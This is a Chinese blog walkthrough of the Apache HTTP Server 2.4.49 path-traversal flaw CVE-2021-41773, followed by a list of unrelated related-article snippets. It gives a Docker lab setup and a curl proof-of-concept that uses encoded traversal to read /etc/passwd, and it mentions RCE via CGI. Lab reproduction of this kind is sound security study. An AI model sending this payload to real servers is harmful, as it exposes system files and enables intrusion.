常见中间件漏洞(Apache)

devtools/2025/3/25 23:51:36/

CVE-2021-41773

该漏洞是由于Apache HTTP Server 2.4.49版本存在目录穿越漏洞,在路径穿越目录
<Directory/>Require all granted</Directory>允许被访问的的情况下(默认开启),攻击者可利用该路径穿越漏洞读取到Web目录之外的其他文件在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执行任意cgi命令(RCE)
拉取环境 docker pull blueteamsteve/cve-2021-41773:no-cgid
启动环境 docker run -d -p 8082:80 97308de4753d
1.开启环境,访问页面
2. 使用poc
curl http://116.62.119.171:8082/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
3.利用工具验证
4. 在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执行任意cg命令

http://www.ppmy.cn/devtools/171192.html

相关文章

【Linux】Reactor模式

文章目录 &#x1f449;Reactor 模式&#x1f448;什么是 Reactor 模式Reactor 模式的组件Reactor 模式的工作流程 &#x1f449;使用 Reactor 模式设计 TcpServer&#x1f448;socket 的封装日志模块Epoll 模型的封装TcpServer 的设计协议定制服务端的编写客户端的编写将业务替…

夯实 kafka 系列|第二章:kafka 常用参数配置

文章目录 1.前言2.常用参数2.1 broker 参数2.1.1 log.dirs2.1.2 ZooKeeper 集群2.1.3 数据留存&#xff08;全局级别&#xff09; 2.2 topic 参数2.2.1 数据留存&#xff08;topic级别&#xff09;2.2.2 auto.create.topics.enable 2.3 jvm 参数2.4 动态参数2.4.1 概述2.4.2 常…

卡特兰数在数据结构上面的运用

原理 Catalan数是一个数列&#xff0c;其第n项表示n个不同结点可以构成的二叉排序树的数量。Catalan数的第n项公式为&#xff1a; &#xfffc; 其中&#xff0c;&#xfffc;是组合数&#xff0c;表示从2n个元素中选择n个元素的组合数。 Catalan数的原理可以通过以下方式理解&…

【数据库】sql错题详解

1. 执行子查询 SELECT 供应商号 FROM 订购单 WHERE 职工号 IN (E1, E3) GROUP BY 供应商号 HAVING COUNT(DISTINCT 职工号) 2筛选职工号为 E1 或 E3 的记录&#xff1a; 依据 WHERE 职工号 IN (E1, E3) 这个条件&#xff0c;从 订购单 表中把职工号为 E1 或者 E3 的记录筛选出…

零、ubuntu20.04 安装 anaconda

1.anaconda下载 地址&#xff1a;Index of /anaconda/archive/ | 清华大学开源软件镜像站 | Tsinghua Open Source Mirror 选择&#xff1a;Anaconda3-2023.07-2-Linux-x86_64.sh 2.anaconda安装 选择下载目录&#xff0c;选在在终端中打开&#xff0c;然后在终端输入安装命…

C# SerialPort 使用详解

总目录 前言 在工业控制、物联网、嵌入式开发等领域&#xff0c;串口通信&#xff08;Serial Port Communication&#xff09;是连接串行设备&#xff08;如条码扫描器、GPS接收器等&#xff09;与计算机的重要手段。C# 提供了内置的 SerialPort 类&#xff0c;简化了串口开发…

ue5蓝图项目转换为c++项目 遇到的问题

蓝图项目转c项目 工具/新建C类&#xff0c;随便新建一个c类&#xff0c;即可从蓝图项目转换为c项目 如果转换正常&#xff0c;UE5会要求重新编译程序&#xff0c;并在编译完后自动打开VS 转换前要备份 转换失败的原因 电脑上必须安装了.Net6.0&#xff0c;其他版本高了低了…

tortoiseSVN、source insignt、J-flash使用

tortoiseSVN 1.下载压缩包安装&#xff0c;安装过程不描述 2.安装汉化插件后&#xff0c;可设置语言 3.先新建一个空的文件夹TESTSVN&#xff0c;右击文件夹->TortoiseSVN->选择“在此创建版本库”->确定 4.新建空的文件夹TESTSVN_WORK&#xff0c;进入后选择SVN检出…